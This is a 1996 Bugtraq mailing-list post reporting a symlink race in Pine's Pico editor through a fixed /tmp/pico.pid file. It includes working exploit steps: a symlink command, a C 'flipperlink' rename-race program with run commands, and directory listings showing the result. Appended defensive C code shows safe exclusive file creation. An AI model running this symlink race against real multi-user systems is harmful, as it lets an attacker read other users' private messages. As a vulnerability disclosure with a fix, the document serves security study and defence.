Bugtraq mailing list archives
Re: message rejected: Re: [linux-security] Pine security problem.
From: dupuis () lei ucl ac be (Pascal A. Dupuis)
Date: Fri, 13 Sep 1996 10:07:19 +0200
Hello,

I got a bunch of messages in reply to Re: Pine Security problem. Here is a summary:

First of all, the exploit is straightforward with Linux:

    ln -s /tmp/hacker.tmp /tmp/pico.pid; touch /tmp/hacker.tmp;

The /tmp/hacker.tmp must be rw-rw-rw- (mode 666), and everybody could have a look at the composed message.

I also tried Rogier Wolff's suggestion about the flipperlink program, running at high processor load to have swapping (compiling the kernel):
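
    #include <stdio.h>   /* rename() */

    /* Endlessly swap the two names given on the command line. */
    int main(int argc, char **argv)
    {
        while (1) {
            rename(argv[1], argv[2]);
            rename(argv[2], argv[1]);
        }
    }
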
and run it with:

    cd /tmp
    ln -s hacker.tmp pico.pid
    flipperlink pico.pid bla

Once the alternate editor is invoked, the hacker.tmp, if not existing, is created 600, owned by the pine user. At this time, the toggle stops working as long as the alternate editor is working. The amazing fact is the ownership:

    ls -l /tmp
    lrwxrwxrwx 1 hacker grp 10 Sep 13 09:49 bla ->hacker.tmp
    -rw------- 1 dupuis grp 3042 Sep 13 09:50 hacker.tmp
    hacker> more blah
    hacker>blah: permission denied

It is thus the ownership of the destination file which is used.

Greetings

Pascal A. Dupuis

--
Information Science is emerging from the Prehistoric Ages, but its language still reflects it : gnu, hurd, awk, nroff, ls, ar, chmod, ...
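
The defensive counterpart to the report above, as an added example that is not part of the original post and is not Pine's or Pico's code: a program that must use a fixed name in /tmp can refuse any name that already exists, links included, and then verify the file it actually holds. The names create_private and demo_refuses_planted_link are hypothetical, and the scratch directory and other.tmp are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: create path as a new 0600 regular file. O_EXCL makes
 * open() fail with EEXIST if any name, even a dangling link, is already there. */
int create_private(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Confirm what we hold: a regular file, ours, with a single name. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario in a private scratch directory: "pico.pid" already
 * exists as a link to "other.tmp". Returns 1 if the create was refused and
 * other.tmp was never created, 0 otherwise, -1 on setup failure. */
int demo_refuses_planted_link(void)
{
    char dir[] = "/tmp/symdemoXXXXXX", lnk[64], target[64];
    struct stat st;
    if (!mkdtemp(dir))
        return -1;
    snprintf(lnk, sizeof lnk, "%s/pico.pid", dir);
    snprintf(target, sizeof target, "%s/other.tmp", dir);
    if (symlink("other.tmp", lnk) != 0)
        return -1;
    int fd = create_private(lnk);
    int refused = (fd < 0 && errno == EEXIST);
    int target_absent = (stat(target, &st) != 0);
    if (fd >= 0)
        close(fd);
    unlink(lnk); unlink(target); rmdir(dir);
    return refused && target_absent;
}

int main(void) { printf("%d\n", demo_refuses_planted_link()); return 0; }
```

A private per-user directory or mkstemp() avoids the shared fixed name altogether; the check above is for cases where the name cannot change.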